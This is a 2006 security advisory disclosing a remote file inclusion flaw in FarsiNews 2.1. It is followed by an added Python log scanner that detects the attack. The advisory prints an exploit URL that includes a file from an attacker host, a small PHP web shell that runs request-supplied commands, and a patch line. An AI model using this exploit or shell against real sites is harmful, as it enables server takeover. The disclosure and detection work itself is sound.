FarsiNews 2.1 PHP Remote File Inclusion
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx, "content-editor@xxxxxxxxxxxxxxxxx" <content-editor@xxxxxxxxxxxxxxxxx>, "editor@xxxxxxxxxxxxxxxxx" <editor@xxxxxxxxxxxxxxxxx>, "expert@xxxxxxxxxxxxxx" <expert@xxxxxxxxxxxxxx>, "news-editor@xxxxxxxxxxxxxxxxx" <news-editor@xxxxxxxxxxxxxxxxx>, "support@xxxxxxxxxxx" <support@xxxxxxxxxxx>, "vuldb@xxxxxxxxxxxxxxxxx" <vuldb@xxxxxxxxxxxxxxxxx>, "vuln@xxxxxxxxxxx" <vuln@xxxxxxxxxxx>, "webmaster@xxxxxxxxxxx" <webmaster@xxxxxxxxxxx>, "webmaster@xxxxxxxxxxxxxxxxx" <webmaster@xxxxxxxxxxxxxxxxx>
- Subject: FarsiNews 2.1 PHP Remote File Inclusion
- From: h e <het_ebadi@xxxxxxxxx>
- Date: Tue, 31 Jan 2006 05:47:57 -0800 (PST)

Remote File Inclusion in FarsiNews 2.1 and below

Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team): admin@xxxxxxxxx
The original article can be found at:
http://hamid.ir/security

Vulnerable Systems:
FarsiNews 2.1 Beta 2 and below

Vulnerable Code:
The following lines in loginout.php:
require_once($cutepath."/inc/functions.inc.php");
require_once($cutepath."/data/config.php");

Exploits:
If register_globals is On (check php.ini), the cutepath request parameter sets $cutepath, and the URL below can be used to make loginout.php include an external file.
The following URL will cause the server to include an external file (phpshell.txt):
http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?
phpshell.txt
-------------------
<?
system ($_GET['cmd']);
die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid
Network Security Team)</h3> ");
?>
-----[EOF]--------

Workaround:
Use FarsiNews 2.5, or, for an unofficial patch, simply add the following line as the second line of loginout.php:
if (isset($_REQUEST["cutepath"])){ die("Patched by Hamid Ebadi -->http://hamid.ir ( Hamid Network Security Team) "); }
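
A defender-side check for the request pattern this advisory describes, as an added example that is not part of the original advisory: it scans web access log lines for requests that supply cutepath in the query string and marks values that begin with a URL scheme. The log lines are constructed samples, and the Apache combined log format and the verdict labels are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (Apache combined log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Jan/2006:14:02:11 +0000] "GET /loginout.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Jan/2006:14:03:40 +0000] "GET /loginout.php?cmd=dir&cutepath=http://remote.example/phpshell.txt? HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.7 - - [31/Jan/2006:14:03:58 +0000] "GET /loginout.php?cutepath=hTTp%3A%2F%2Fremote.example%2Fx.txt%3F HTTP/1.1" 200 90 "-" "-"',
    '203.0.113.5 - - [31/Jan/2006:14:05:02 +0000] "GET /index.php?ref=http://news.example/ HTTP/1.1" 200 7000 "-" "-"',
    '203.0.113.9 - - [31/Jan/2006:14:06:00 +0000] "GET /loginout.php?cutepath=. HTTP/1.1" 200 83 "-" "-"',
]

# Client, timestamp and request target of one combined-format log line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+)[^"]*"')
# Value that starts with scheme:// (http, ftp, or a PHP stream wrapper).
WRAPPER_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)
# The variable loginout.php passes to require_once, per the advisory.
PATH_VAR = "cutepath"


def scan(lines):
    """Return (client, path, verdict) for each request that supplies cutepath."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, _when, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes, so encoded schemes are caught as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # PHP also binds cutepath[...] to $cutepath, so compare the base name.
            if name.split("[", 1)[0] != PATH_VAR:
                continue
            if WRAPPER_RE.match(value):
                verdict = "remote-include"
            else:
                # Same condition the unofficial patch rejects: cutepath set by the client.
                verdict = "request-supplied"
            findings.append((client, parts.path, verdict))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

Access logs record only the query string, so a cutepath value sent in a POST body or cookie, which register_globals also imports, will not show up in this scan.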